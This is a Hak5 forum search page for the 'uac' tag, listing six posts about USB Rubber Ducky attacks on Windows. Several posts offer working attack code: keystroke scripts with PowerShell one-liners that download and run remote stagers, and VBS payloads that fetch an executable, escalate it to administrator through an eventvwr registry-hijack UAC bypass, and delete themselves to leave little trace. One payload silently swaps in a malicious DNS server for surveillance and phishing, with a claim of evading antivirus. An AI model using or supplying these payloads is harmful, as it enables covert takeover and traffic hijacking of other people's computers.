Jump to content

Search the Community

Showing results for tags 'uac'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

Found 6 results

  1. Hello! This is my first post and contribute to this community, one of hopefully many. I am yet to receive my rubber ducky, so while waiting i thought i give writing some scripts a go. I consider the rubber ducky to be the mother of physical access exploits, being able to deploy anything in a very short period of time. DELAY 750 GUI r DELAY 1000 STRING powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://myhost.com/script.txt', '%temp%/run.vbs') ;Start-Process '%temp%/run.vbs'}" DELAY 500 ENTER Above is a basic rubber ducky script that downloads and executes a .vbs script in one line using the "run" prompt in windows. Nothing fancy, fast and easy download and execute, however we are taking this a bit further. (This is the part i cannot yet test myself due to me not having the Rubber ducky at hand, however based on examples, this should be OK, please confirm if you have time) To get maximum speed we are using a 2 step process, getting a low sized script file is much faster then going to the payload itself straight away. This is the script.txt (run.vbs when saved) Sub Main() 'Setting some vars fileurl = "https://the.earth.li/~sgtatham/putty/latest/x86/putty.exe" filename = WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) & "/pt.exe" 'Download function dim shellobj set shellobj = wscript.createobject("wscript.shell") strlink = fileurl strsaveto = filename set objhttpdownload = createobject("msxml2.xmlhttp" ) objhttpdownload.open "get", strlink, false objhttpdownload.send set objfsodownload = createobject ("scripting.filesystemobject") if objfsodownload.fileexists (strsaveto) then objfsodownload.deletefile (strsaveto) end if if objhttpdownload.status = 200 then dim objstreamdownload set objstreamdownload = createobject("adodb.stream") with objstreamdownload .type = 1 .open .write objhttpdownload.responsebody .savetofile strsaveto .close end with set objstreamdownload = nothing end if 'UAC bypass/exploit setup Set WshShell = CreateObject("WScript.Shell") myKey = "HKCU\Software\Classes\mscfile\shell\open\command\" WshShell.RegWrite myKey,filename ,"REG_SZ" 'UAC bypass/exploit trigger CreateObject("WScript.Shell").Run "eventvwr.exe" WScript.Sleep 1000 'UAC bypass/exploit cleanup Set objShell = Wscript.CreateObject("Wscript.Shell") objShell.RegDelete "HKCU\Software\Classes\mscfile\shell\open\command\" 'Cleanup removal of this script after completed Set Cleanup = WScript.CreateObject("WScript.Shell") Cleanup.Run "cmd /c del %temp%\run.vbs", 0, True End Sub 'We dont want to display any errors On Error Resume Next Main If Err.Number Then 'on error cleanup and exit set Cleanup = WScript.CreateObject("WScript.Shell") Cleanup.Run "cmd /c del %temp%\run.vbs", 0, True WScript.Quit 4711 End If I have commented this to my best ability. its pretty straight forward and is about 2kb in size It download and executes (in this case putty) as pt.exe in the temp folder of the current windows user. It then proceeds to write the payload file-path as a string value to "HKCU\Software\Classes\mscfile\shell\open\command\", we then trigger "eventvwr.exe" which is a built in windows application, this will launch our payload (pt.exe) as ADMIN on the targeted machine without any form of UAC prompt prompting the user. We then remove the reg-key to avoid issues in the future followed by the vbs script removing itself from the computer leaving little trace. If any point we get an error we also remove the script. . This method of bypassing UAC giving admin rights to any application using the path written as a string in the reg-key works on all versions of windows(From where the UAC system was introduced ofc) as far up as Windows 10 Pro 64Bit Build 1607. Basically 90% of machines. I hope you all enjoyed this, i will be making a short demo video of this to see the deployment speed when i receive my copy of the rubber ducky. Best Regards ~skiddie
  2. I just got my new Ducky today but I'm getting no love with anything else but Hello World :( The problem seems to be the UAC security. I'm using Windows 7. The command ALT y does not work. It's not a delay issue, I played with that to all extents. It seems to be a focus problem where the ALT y is being sent to another window as the UAC Window does not have focus when it pops up. Am I the only one with this issue? Is there a reliable work around to bring focus to a specific window or anther fix? Without being able to get passed the UAC check, the Ducky would be rather Sucky. No offense, it's a cool gadget, I couldn't stop the rhyme! Thanks Steve
  3. This is a payload mainly based of the UAC bypassing download and execute payload generator i released not so long ago I strongly suggest you check that out first. https://www.youtube.com/watch?v=fmRRX7-G4lc https://github.com/SkiddieTech/UAC-D-E-Rubber-Ducky So the goal of this payload is to add a new primary "malicious" DNS server for all active networks devices on any windows computer, to do this we use the UAC bypass method used in the above payload , but in a different payload (also in the same "Visual basic " script format) The "gain" from this would be to surveillance DNS requests and/or setup phishing websites targeted/customized for those requests/victim. So for the ducky script we are going to be using the following code DELAY 1000 GUI r DELAY 100 STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('[SOURCE]', '%temp%/[NAME]'); %temp%/[NAME] ENTER You wanna replace the "[NAME]" with a random name value ending in the .vbs extensions (Example: update.vbs) You wanna replace the [SOURCE] with the URL for the stager payload source(below) preferably hosted on paste-bin (Example: http://www.pastebin.com/raw/NEyDVtER ) <- /raw/ is IMPORTANT) Here is the .vbs payload. Dim objWMIService, objShell, colItems, objItem Set objShell = CreateObject("Wscript.Shell") Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2") Set colItems = objWMIService.ExecQuery("SELECT * FROM Win32_NetworkAdapter WHERE NetConnectionStatus = 2") 'For each active network adapter For Each objItem in colItems 'Write UAC bypass regkey with the cmd command as value CreateObject("WScript.Shell").RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", "cmd /c netsh interface ipv4 set dns " + chr(34) + objItem.NetConnectionID + chr(34) + " static X.X.X.X primary" ,"REG_SZ" 'Trigger UAC bypass CreateObject("WScript.Shell").Run("eventvwr.exe"),0,true 'Reset regkey GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & "." & "\root\default:StdRegProv").DeleteValue &H80000001,"Software\Classes\mscfile\shell\open\command\","" Next Here you wanna replace "X.X.X.X" with your malicious DNS server. If you need help setting up the DNS server you can have a look at this tutorial -> https://blog.heckel.xyz/2013/07/18/how-to-dns-spoofing-with-a-simple-dns-server-using-dnsmasq/ This again just show how fast,effective,invisible and powerless staged payloads for the rubber ducky is, especially with the UAC bypass integrated . Also, from what i can tell this bypasses all av's... Best Regards ~Skiddie
  4. This is my official release of my UAC bypassing Rubber Ducky payload generator "UAC-DUCK". Download and execute any binary executable on any windows machine with UAC enabled as administrator WITHOUT prompting the user to elevate privileges . Its a 3 second download and execute with admin access. Generator written in Python so it's cross compatible with Windows and Linux. Github: https://github.com/SkiddieTech/UAC-D-E-Rubber-Ducky Full demo: http://sendvid.com/uh6i317i It uses a simple 2 stage process Stage 1: Stage one is the script that is triggered when the ducky is connected to any targeted windows machine. It will execute an powerful one-liner inside the "run" dialog of the system. The one liner is a simple powershell script, that when executes instantly hides then powershell windows and runs it the background. The powershell script downloads and execute our stage 2 .vbs payload in the %temp% directory Stage 2: Once your .vbs payload is on the system, we proceed to download our main binary payload. The .vbs script exploits a flaw in the windows registry system, this allows us to execute any binary file on the system with admin privilege without prompting the user for access (UAC). My Twitter: https://twitter.com/SkiddieTech
  5. Hi I'm new and just got my Rubber Ducky. Why can't I bypass UAC? Am I doing something wrong? It pops up with the UAC password prompt screen. "Do you want to allow the following program to make changes to this computer?" and then it asks for the password. Here's the code I'm using. GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 3000 ALT y DELAY 500 STRING echo Admin Prompt in 5 seconds This doesn't work either DELAY 200 STRING cmd DELAY 200 MENU DELAY 100 STRING a ENTER DELAY 200 LEFT ENTER I'm running Windows 7 SP1
  6. Hello gentleman, Sorry in advance if this issue have been answered before, I was searching the forum for some information and did´nt found something that clarify my needs. I am doing my first tests with ducky in some Windows 7 / 8 machines. What I noticed was that in both English and Portuguese (pt-br) systems, when I can the command "powershell Start-Process cmd -Verb runAs" As you can see, when UAC prompt appears, Windows Powershell continues to have the focus, so I can´t submit the command "ALT S" (equivalent to ALT Y on English systems) to the UAC window and go on with my Command Quacking. In another thread I see a friend of the forum saying that solved using "GUI TAB" command, but over here this is not working. Some of you know how I can go ahead to solve this? Ty!
×
×
  • Create New...